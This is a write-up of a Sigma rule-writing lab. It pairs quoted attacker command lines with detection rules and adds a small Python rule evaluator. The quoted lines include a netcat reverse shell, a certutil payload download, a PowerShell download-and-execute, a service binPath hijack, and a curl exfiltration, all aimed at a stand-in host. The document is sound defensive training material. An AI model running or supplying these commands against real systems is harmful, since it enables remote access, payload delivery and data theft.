The SigHunt room lets us practise writing Sigma rules. It emphasises selecting the right IoCs: a rule built on IoCs that are too generic fires far too broadly, while one built on IoCs that are too specific (and easily changed by the attacker) misses the core behaviour of the incident.

This write-up only contains the Sigma rules used to obtain each flag. Since only the detection part of a rule matters for the challenge, I will show just the detection block of each rule.

1. HTA payload

What we know:

  • Parent Image: chrome.exe
  • Image: mshta.exe
  • Command Line: C:\Windows\SysWOW64\mshta.exe C:\Users\victim\Downloads\update.hta

detection:
  selection:
    ParentImage|contains:
      - 'chrome.exe'
    Image|contains:
      - 'mshta.exe'
    EventID: '1'
  condition: selection

2. Certutil Download

What we know:

  • Image: certutil.exe
  • Command Line: certutil -urlcache -split -f hxxp[:]//huntmeplz[.]com/ransom.exe ransom.exe

detection:
  selection:
    EventID: '1'
    CommandLine|contains|all:
      - 'certutil'
      - '-urlcache'
      - '-split'
      - '-f'
    Image|contains:
      - 'certutil.exe'
  condition: selection

3. Netcat Reverse Shell

  • Image: nc.exe
  • Command Line: C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe
  • MD5 Hash: 523613A7B9DFA398CBD5EBD2DD0F4F38

Here we can match it either by name (nc.exe) or by its MD5 hash, so the rule uses two selections joined with or.

detection:
  selection:
    EventID: 1
    CommandLine|contains|all:
      - ' -e '
    Image|contains:
      - 'nc.exe'
  selection2:
    Hashes|contains:
      - 'MD5=523613A7B9DFA398CBD5EBD2DD0F4F38'
  condition: selection or selection2

4. PowerUp Enumeration

  • Image: powershell.exe
  • Command Line: powershell "iex(new-object net.webclient).downloadstring('hxxp[://]huntmeplz[.]com/PowerUp.ps1'); Invoke-AllChecks;"

detection:
  selection:
    EventID: 1
    CommandLine|contains|all:
      - 'downloadstring'
      - 'powershell'
      - 'Invoke-AllChecks'
      - 'new-object net.webclient'
    Image|contains:
      - 'powershell.exe'
  condition: selection

5. Service Binary Modification

  • Image: sc.exe
  • Command Line: sc.exe config SNMPTRAP binPath= "C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe"

detection:
  selection:
    EventID: 1
    CommandLine|contains|all:
      - ' binPath= '
      - 'sc.exe'
      - ' config '
    Image|contains:
      - 'sc.exe'
  condition: selection

6. RunOnce Persistence

  • Image: reg.exe
  • Command Line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v MicrosoftUpdate /t REG_SZ /d "C:\Windows\System32\cmdd.exe"

detection:
  selection:
    EventID: 1
    CommandLine|contains|all:
      - 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'
      - 'reg'
      - ' add '
    Image|contains:
      - 'reg.exe'
  condition: selection

7. 7-zip Collection

  • Image: 7z.exe
  • Command Line: 7z a exfil.zip * -p

detection:
  selection:
    EventID: 1
    CommandLine|contains|all:
      - '-p'
      - '7z'
      - ' a '
    Image|contains:
      - '7z.exe'
  condition: selection

8. cURL Exfiltration

  • Image: curl.exe
  • Command Line: curl -d @exfil.zip hxxp[://]huntmeplz[.]com:8080/

detection:
  selection:
    EventID: 1
    CommandLine|contains|all:
      - '.zip'
      - 'curl'
      - ' -d '
    Image|contains:
      - 'curl.exe'
  condition: selection

9. Ransomware File Encryption

  • Image: ransom.exe
  • Target Filename: *.huntme

detection:
  selection:
    EventID: 11
    TargetFilename|endswith:
      - 'huntme'
  condition: selection
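As an added example (my own code, not part of the room or of the Sigma project), here is a small Python evaluator for the modifiers these rules use (contains, contains|all, endswith, plain equality) and for flat or/and conditions, run over constructed Sysmon-style events against rule 3. It shows why pairing name and hash matters: a renamed copy slips past the Image check but not the hash, and a recompiled nc.exe does the reverse. The evaluator is deliberately minimal; real Sigma backends handle far more syntax.

```python
def _match_field(value, spec, modifiers):
    # Sigma string matching is case-insensitive; a list of values is OR-ed
    # unless the |all modifier is present.
    wanted = [str(v).lower() for v in (spec if isinstance(spec, list) else [spec])]
    value = str(value).lower()
    if "contains" in modifiers:
        hits = [w in value for w in wanted]
    elif "endswith" in modifiers:
        hits = [value.endswith(w) for w in wanted]
    else:  # no modifier: plain equality, e.g. EventID: 1
        hits = [value == w for w in wanted]
    return all(hits) if "all" in modifiers else any(hits)

def selection_matches(selection, event):
    # Every field listed in a selection must match (implicit AND).
    for key, spec in selection.items():
        field, *modifiers = key.split("|")
        if field not in event or not _match_field(event[field], spec, modifiers):
            return False
    return True

def evaluate(detection, event):
    # Flat conditions only: a single selection name, 'a or b', or 'a and b'.
    results = {n: selection_matches(s, event) for n, s in detection.items() if n != "condition"}
    cond = detection["condition"]
    if " or " in cond:
        return any(results[n.strip()] for n in cond.split(" or "))
    if " and " in cond:
        return all(results[n.strip()] for n in cond.split(" and "))
    return results[cond.strip()]

# Rule 3 from the write-up, as the dict a YAML parser would produce for it.
NETCAT_RULE = {
    "selection": {"EventID": 1, "CommandLine|contains|all": [" -e "],
                  "Image|contains": ["nc.exe"]},
    "selection2": {"Hashes|contains": ["MD5=523613A7B9DFA398CBD5EBD2DD0F4F38"]},
    "condition": "selection or selection2",
}

# Constructed Sysmon-style events (not real telemetry): a renamed copy of nc.exe
# with the original hash, a recompiled nc.exe with a new hash, and benign noise.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Temp\svc.exe", "Hashes": "MD5=523613A7B9DFA398CBD5EBD2DD0F4F38",
     "CommandLine": r"C:\Temp\svc.exe huntmeplz.com 4444 -e cmd.exe"},
    {"EventID": 1, "Image": r"C:\Temp\nc.exe", "Hashes": "MD5=11111111111111111111111111111111",
     "CommandLine": r"C:\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "Hashes": "MD5=00000000000000000000000000000000",
     "CommandLine": "notepad.exe notes.txt"},
]
```

Calling evaluate(NETCAT_RULE, e) for each event gives True, True, False: the first event is caught only by selection2, the second only by selection.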

This is the end of the write-up. Hope it was useful.